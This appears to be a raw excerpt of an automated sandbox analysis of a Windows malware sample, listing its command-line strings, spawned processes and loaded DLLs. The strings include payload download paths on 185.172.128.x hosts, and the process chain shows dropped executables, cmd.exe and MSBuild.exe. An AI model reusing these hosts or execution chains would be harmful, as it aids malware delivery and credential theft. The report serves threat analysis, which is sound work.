                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /timeSync.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /timeSync.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2030_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.590_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /timeSync.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /syncUpd.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /1/Package.zip0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /1/Package.zip0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /1/Package.zip0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .zip0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .zip0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: \run.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: \run.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /BroomSetup.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /BroomSetup.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /BroomSetup.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_04164C75
                              Source: VucRf0jboS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                              Source: u5qk.0.exe, u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                              Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                              Source: VucRf0jboS.exeReversingLabs: Detection: 44%
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile read: C:\Users\user\Desktop\VucRf0jboS.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\VucRf0jboS.exe "C:\Users\user\Desktop\VucRf0jboS.exe"
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe "C:\Users\user\AppData\Local\Temp\u5qk.0.exe"
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe "C:\Users\user\AppData\Local\Temp\u5qk.3.exe"
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 2108
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe "C:\Users\user\AppData\Local\Temp\u5qk.0.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe "C:\Users\user\AppData\Local\Temp\u5qk.3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msvcr100.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: zipfldr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winshfhc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wdscore.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winshfhc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wdscore.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: msvcr100.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: mozglue.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: msvcp140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: oledlg.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: pla.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: tdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
